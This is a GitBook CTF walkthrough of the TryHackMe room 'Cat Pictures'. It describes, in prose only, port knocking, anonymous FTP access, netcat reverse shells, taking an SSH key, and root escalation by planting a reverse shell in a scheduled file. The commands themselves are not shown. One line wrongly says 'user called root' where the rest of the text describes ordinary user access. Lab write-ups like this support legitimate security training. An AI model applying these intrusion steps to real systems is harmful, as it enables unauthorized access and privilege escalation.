📓
Pentesting
  • Writeups
  • HackTheBox
    • Easy Machines
      • Beep Writeup
      • Shocker Writeup
      • Lame Writeup
      • Jerry Writeup
      • Legacy Writeup
      • Blue Writeup
  • TryHackMe
    • Walkthroughs: Easy
      • CC: Steganography
      • Cryptography for Dummies
      • Cross-site Scripting
      • SQL Injection Lab
      • SQL Injection
      • ZTH: Web 2
      • SSRF
      • XXE
      • Authenticate
      • Injection
      • Blaster
      • The Cod Caper
      • Hardening Basics Part 1
      • What the Shell?
      • Game Zone
      • Upload Vulnerabilities
      • Bolt
      • Erit Securus 1
      • CC: Pentesting
      • JavaScript Basics
      • OverPass 2 - Hacked
      • Linux: Local Enumeration
      • Ice
      • Linux Backdoors
      • Avengers Blog
      • DNS in Detail
      • Putting it all together
      • Kenobi
      • Common Linux Privesc
      • Network Services 2
      • Network Services
      • The Hacker Methodology
      • The Find command
      • HTTP in Detail
      • Web Fundamentals
      • How Websites Work
      • Introductory Networking
    • Challenges (CTF): Easy
      • VulNet: Roasted
      • VulNet: Internal
      • Git Happens
      • Kiba
      • VulNet: Node
      • Memory Forensics
      • Smag Grotto
      • Investigating Windows
      • Cat Pictures
      • Juicy Details
      • Anthem
      • Tony The Tiger
      • Jack-of-All-Trades
      • JPGChat
      • Blueprint
      • All in One
      • Gotta Catch'em All
      • Mustacchio
      • Break Out The Cage
      • HeartBleed
      • Poster
      • Madness
      • Source
      • Thompson
      • Library
      • Magician
      • Anonforce
      • Dav
      • GLITCH
      • Fowsniff CTF
      • Team
      • H4cked
      • Easy Peasy
      • ColddBox: Easy
      • Archangel
      • Cyborg
      • Chocolate Factory
      • Brute It
      • Year of the Rabbit
      • ChillHack
      • Gaming Server
      • Brooklyn Nine Nine
      • Wgel CTF
      • Tomghost
      • ToolsRus
      • Skynet
      • Startup
      • Agent Sudo
      • Lian-Yu
      • OhSINT
      • Overpass
      • Crack The Hash
      • Ignite
      • Inclusion
      • Bounty Hunter
      • LazyAdmin
      • RootMe
      • Pickle Rick
      • Basic Pentesting
      • Simple CTF
  • Crackmes.one
    • 1 Difficulty Rating
      • easyAF
      • Easy Keyg3nme
Powered by GitBook
On this page
  • Scanning
  • Enumeration
  • Exploitation
  • Privilege Escalation

Was this helpful?

  1. TryHackMe
  2. Challenges (CTF): Easy

Cat Pictures

PreviousInvestigating WindowsNextJuicy Details

Last updated 3 years ago

Was this helpful?

Scanning

Lets run some nmap scans to see what ports and services are open on the machine

Enumeration

Lets visit the website on port 8080

Lets look at the first forum

Looks like this message is hinting Port Knocking. To do this we can use a tool called knockd. Lets install it.

Now lets use the knock command (a few times) and also run the nmap scan again.

We can see that port 21 is now open, and anonymous login is allowed, lets check it out and get any files on the server to our machine.

Ok, so lets connect to port 4420 on the machine using Netcat

Exploitation

Lets try to get a reverse shell on the machine, lets first start a netcat listener

We have a reverse shell on the machine, lets check what files there are on the machine.

Lets download this file to our machine using netcat.

First we start a netcat listener

Then we send the file to our machine using netcat

And now we should have the runme file on our machine

Lets check the file type of the runme file

Its a binary file, lets run the strings command to get more information about the file

The highlighted lines are interesting , lets run the binary on the machine and supply the password that we see here and check what happens. We also have to run the command from the /tmp directory as they moved into the temp directory after entering the password. Lets run the command and then check the content of the catlover directory to see what changed

Looks like we have a id_rsa file, lets copy the content of this file to a file on our machine and then login through ssh.

Now lets login, we first have to give permissions and the username that we are going to be logging in as was found when we used to strings command on the binary file , the username: catlover

We are now a user called root

We have the first flag, but we do not have the root flag, so lets explore the machine a bit more.

Privilege Escalation

Looking through the system, there is an interesting file, lets read it

Looks like they are adding a reverse shell to the file, lets do the same so that we can get a reverse shell as a higher privileged user which is root.

Once we change the content of the file, lets save it and start a netcat listener on our machine

After a while, you should get a reverse shell on the machine

You can read the root flag

Now lets run the reverse shell command, you can find it

here